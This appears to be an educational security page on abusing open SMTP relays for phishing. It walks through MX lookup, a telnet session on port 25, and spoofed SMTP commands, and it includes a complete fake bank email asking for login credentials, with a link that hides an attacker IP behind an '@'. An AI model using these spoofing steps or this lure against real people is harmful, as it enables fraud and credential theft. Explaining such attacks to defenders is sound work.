SMTP Server based exploits - Phishing

The open nature of SMTP has been one of the main cause of phishing threat taking a massive shape. Insecure SMTP server(s) that allows domains relaying can be used ensure anonymity of attacker to its Victim. Not only will this enhance the 'Victims' confidence in the Phished email but will also help the attacker to use his Social engineering tricks in a more believable way!

One of the main reasons why SMTP amongst the weakest protocols when it comes to security issues is that, at the time it was developed the industry was not aware of the existing security issues such as Spam, Phishing, Spoofing etc. However by the time these issues were exposed it was too late as the protocol had gained immense popularity and it still continues to be one of the most widely protocols.

Often one would think that how is the attacker able to have control over a well trusted domain such as citybank.com, suntrust.com or any other financial institution and send mail's to the consumers using legitimate/illegitimate Email Id's such as Customersupport@yourbank.com with phished links!!

Here is a practical demonstration of how an attacker can achieve this :

The attacker follows 4 easy steps to achieve the same :

Step 1

Find the list of mail servers for the targeted Domain:

[root@root]# nslookup
> set querytype=mx
> Targetdomain.com
Server: 192.168.196.8(Dns IP)
Address: 192.168.196.8#53

Non-authoritative answer:
Targetdomain.com mail exchanger = 50 mail4.Targetdomain.com.com.
Targetdomain.com mail exchanger = 60 mail5.Targetdomain.com.com.
Targetdomain.com mail exchanger = 70 mail6.Targetdomain.com.com.
Targetdomain.com mail exchanger = 10 mail1.Targetdomain.com.com.
Targetdomain.com mail exchanger = 20 mail2.Targetdomain.com.com.
Targetdomain.com mail exchanger = 30 mail3.Targetdomain.com.com.

Authoritative answers can be found from:
mail.Targetdomain.com.com internet address = 21X.XXX.XX.X( Ip omitted )

STEP 2

The attacker Telnet's to one of the existing mail servers on port 25

[root@root]# telnet mail4.Targetdomain.com.com. 25
Trying xxx.xxx.x.x...( Ip omitted due to security issues)
Connected to mail4.Targetdomain.com.com. (xx.xxx.x.xx).
220 Mail server name SMTP qpsmtpd 0.28 ready; send us your mail, but not your spam.

STEP 3

The Attacker types a SMTP command "helo" and gets a valid response from the target:

helo""
250 Mail server name Hi Unknown [your IP displayed here]; I am so happy to meet you

STEP4

The attacker uses a set of Formatted SMTP commands to shoot a legitimate looking mail to the victim. A final step to achieve his motive !!

MAIL FROM: customersupport@yourbank.com
RCPT TO: victim@yourbank.com
DATA
FROM:customersupport@yourbank.com
TO:victim@yourbank.com
Subject:important notice
Dear customer
Your Password is expired. Please Re authenticate using your old password and provide us your new login credentials. Kindly take this on priority basis.
Click http://yourbank.com/authenticate/@198.133.xx.xx:80attackers ipaddress


Thanks
Customers Support Department
Yourbank.com

Phishing Attacks

• Cross Site Scripting (XSS)
• Hidden Frame
• Man in the Middle
• Obfuscation Attacks
  • IDN Spoofing Demo
• Phishing
  • Phishing Quiz
• Graphic based Attacks
  • Fake Browser Address Bar
  • Entire Toolbar Faked
  • Fake SSL Padlock Status Bar